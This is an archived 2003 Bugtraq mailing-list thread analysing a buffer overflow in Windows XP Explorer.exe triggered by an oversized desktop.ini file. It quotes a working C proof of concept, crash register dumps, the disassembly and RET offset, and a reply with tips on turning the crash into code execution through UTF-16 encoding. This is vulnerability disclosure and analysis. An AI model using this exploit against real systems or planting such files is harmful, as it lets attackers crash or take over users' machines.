| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030514202001.861A.NESUMIN@softhome.net>
Date: Wed, 14 May 2003 20:27:24 +0900
From: nesumin <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
Hello,
> Due to the size limitation set by the 800H as well as the fact that the
> overflowing string is converted to Unicode, the chance for executing a
> malicious code (Unicode exploit code as well as exploitable RET address) is
> very limited. That is the reason we are documenting it in details here.
I could create the exploit code on my Japanese Windows XP SP1.
Perhaps, I think you can easily create the full exploit code
by the following;
* You can directly specify all overwritten data without thinking
the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
(Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".)
* You can get the code area of about 0xFF4 bytes.
(Before and after RET address)
Best Regards.
---------------------------------
nesumin <nesumin@...thome.net>
-----Original Message-----
From: "Executable Security" <exurity@...ers.com>
Sent: Sun, 11 May 2003 03:28:54 -0500
To: <bugtraq@...urityfocus.com>
Subject: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
> Hi, there:
>
> We were able to duplicate what was reported by Kristopher Matthews and aT4r
> InsaN3. Actually, if you have the following test scenario:
>
> File/Dir Explanation
> C:\
> C:\temp\desktop.ini Overflowing text file
> C:\test directory
>
> The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
> crashes not only Explorer.exe, but also Internet Explorer.exe, and
> application programs (it crashed UltraEdit) that use file-open dialog box
> trying to scan the c:\ hard drive. However, you can do the following safely
> from a DOS prompt for the directory c:\test
>
> Explorer c:\test
>
> Of course, you cannot browse C:\test from the Explorer.exe GUI starting with
> C:\ root directory because of the overflowing c:\temp\desktop.ini file.
> Actually, I assume the overflowing file, no matter where it is located in
> the subdirectory, will crash the Explorer.exe starting with any directory
> higher above the overflowing desktop.ini file. (did not fully test though).
>
> Down to the assembly level, this bug lies in the shell32.dll file as such:
>
> 7740F3C3 lea eax, [ebp-21Ch] ; full path to the
> filename \desktop.in
> 7740F3C9 push eax
> 7740F3CA push 800h ; should be 400h I believe
> 7740F3CF lea eax, [ebp-0A1Ch]
> 7740F3D5 push eax
> 7740F3D6 push offset a_shellclassinf ; ".ShellClassInfo"
> 7740F3DB call ds:GetPrivateProfileSectionW
>
> When GetPrivateProfileSectionW is called, it assumes the buffer to be as
> large as two times of 800h. As you can see, the local buffer is only A1C -
> 21C = 800H for this string. So, it overflows if the desktop.ini contains a
> long string. MSDN documents the third parameter for GetPrivateProfileSection
> as such:
>
> nSize
> Specifies the size, in characters, of the buffer pointed to by the
> lpReturnedString parameter.
>
> To be precise, the buffer overflowing structure for this bug is such:
>
> | --------------------- A1C ---------| EBP | RET | -----------------> higher
> address
>
> The replaceable RET address is located at (A1C+4)/2 = 510.
>
> Due to the size limitation set by the 800H as well as the fact that the
> overflowing string is converted to Unicode, the chance for executing a
> malicious code (Unicode exploit code as well as exploitable RET address) is
> very limited. That is the reason we are documenting it in details here.
>
> We do not know how this bug affects shell32.dll files on other Windows
> versions.
>
> With due credits to those who wrote the emails quoted below.
>
> Peter Huang
> http://members.rogers.com/exurity/
>
> -----Original Message-----
> From: Kristopher Matthews [mailto:krism@...lsnare.net]
> Sent: Friday, May 09, 2003 11:43 AM
> To: 'Ryan Yagatich'
> Cc: vuln-dev@...urityfocus.com
> Subject: RE: Buffer overflow in Explorer.exe
>
> I have tested and duplicated this behavior on a fully patched/updated
> Windows XP Pro system.
>
> 1. The overflow is for that particular key, AFAICT.
> 1a. It will not work for the root (c:/) directory; explorer.exe does not
> parse 'desktop.ini' for that directory. It will, however, work for any other
> directory.
> 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
> looks for all the world like a standard buffer overflow; I believe a more
> carefully crafted 'desktop.ini' file could be cause for explorer.exe to
> unintentionally execute arbitrary code.
> 3. Download and execute untrusted code? Combine this with any of the other
> popular expoloits for windows; also, it wouldn't be terribly hard to get a
> user to download a 'desktop.ini' file to their "My Documents" directory (in
> the guise, of, say, a folder them, which windows does support; e.g.
> different background, file layout, etc); bam, whenever they open that
> directory, explorer crashes.
>
> Regards,
> Kristopher
>
>
> -----Original Message-----
> From: Ryan Yagatich [mailto:ryany@...tek.com]
> Sent: Thursday, May 08, 2003 6:28 PM
> To: at4r@...esign.es
> Cc: vuln-dev@...urityfocus.com
>
> Hi,
> I don't quite understand the purpose behind this code. It creates
> a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
> contents of
>
> [.ShellClassInfo]
> AAAAAAAAAAAA {x2301}
>
>
> And then terminates? I don't have a windows machine available to
> really explore this any, but what makes that entry in desktop.ini cause
> this? Furthermore, is this issue only for that particular key or is it
> generally just key/excessive parameter/missing value size that is
> affected? And additionally, you mention that explorer will no longer be
> able to operate when trying to browse the hard disk, but does this mean
> globally, or when they try to browse the c:/ drive, or just that
> particular folder?
> Please send me more information about this, (even if it references
> past posts that I have missed) so that I can better understand the
> severity of this. Espcially since to me, I still see it as someone needing
> to download and execute untrusted software which causes a system crash,
> and if that were going to happen there are far worse things that can be
> done besides creating a small text file.
>
> Thanks,
> Ryan Yagatich
>
>
> ,_____________________________________________________,
> \ Ryan Yagatich support@...tek.com \
> / Pantek Incorporated (877) LINUX-FIX /
> \ http://www.pantek.com/security (440) 519-1802 \
> / Are your networks secure? Are you certain? /
> \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
>
> On Wed, 7 May 2003, aT4r InsaN3 wrote:
>
> >This bug allow a malicious an attacker to execute data with privileges of a
>
> >user that is browsing the hard disk with explorer.
> >
> >tested against winxp SP1
> >
> >example code provided.
> >
> <snip>
> >
> > strcpy(path,"\\aT4r[at]3WDesign.es Security");
> > mkdir(path);
> > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
> >
> > strcat(path,"\\desktop.ini");
>
> > bof=fopen(path,"w");
> > fputs("[.ShellClassInfo]\n",bof);
> > memset(evil,'A',BUFF);
> > fputs(evil,bof);
> > fclose(bof);
> <snip>
>
> -----Original Message-----
> From: aT4r InsaN3 [mailto:at4r@...mail.com]
> Sent: Wednesday, May 07, 2003 3:54 PM
> To: vuln-dev@...urityfocus.com
> Subject: Buffer overflow in Explorer.exe
>
> This bug allow a malicious an attacker to execute data with privileges of a
> user that is browsing the hard disk with explorer.
>
> tested against winxp SP1
>
> example code provided.
>
>
> /*
>
> Buffer Overflow in explorer.exe - Proof of Concept
> Tested only against: Windows XP SP1
>
> Found by aT4r@...esign.es
>
> Saludos a:
> - #Haxorcitos@...et= { "Tarako", "Croulder", "Drakar" , "[back]",
> "tyr" }:
> - #localhost and #darknet
>
>
> Usage: just execute this file.
> This code will crash your explorer every time you try to
> browse your
> harddisk
> execute this program again to delete the evil file ;-)
>
> (3ec.464): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70
> edi=000ece90
> eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr
> na po
> nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
> efl=00010246
> 00410041 ?? ???
>
> 3W Design Security 2003. http://www.3WDesign.es/
> */
>
>
> #include <direct.h>
> #include <stdio.h>
> #include <windows.h>
> #include <sys/stat.h>
>
> #define BUFF 2300
> void main(){
>
> char path[256];
> char evil[BUFF+1]="";
> FILE *bof;
> struct stat st;
> printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... ..
> .\n . ..
> ...: \tProof of Concept (aT4r@...esign.es)\t:... .. .\n\n");
> strcpy(path,"\\aT4r[at]3WDesign.es Security");
> mkdir(path);
> SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
>
> strcat(path,"\\desktop.ini");
> if (stat(path,&st)==0)
> { remove(path); exit(1);}//just execute this program twice
> to remote this
> file :P
> bof=fopen(path,"w");
> fputs("[.ShellClassInfo]\n",bof);
> memset(evil,'A',BUFF);
> fputs(evil,bof);
> fclose(bof);
> printf("evil file: %s Created. Try to browse your Harddisk
> O:-)\n",path);
>
>
> }
>
> _________________________________________________________________
> Hipotecas para todos los bolsillos con MSN Money.
> http://money.msn.es/hipotecas/default.asp
Powered by blists - more mailing lists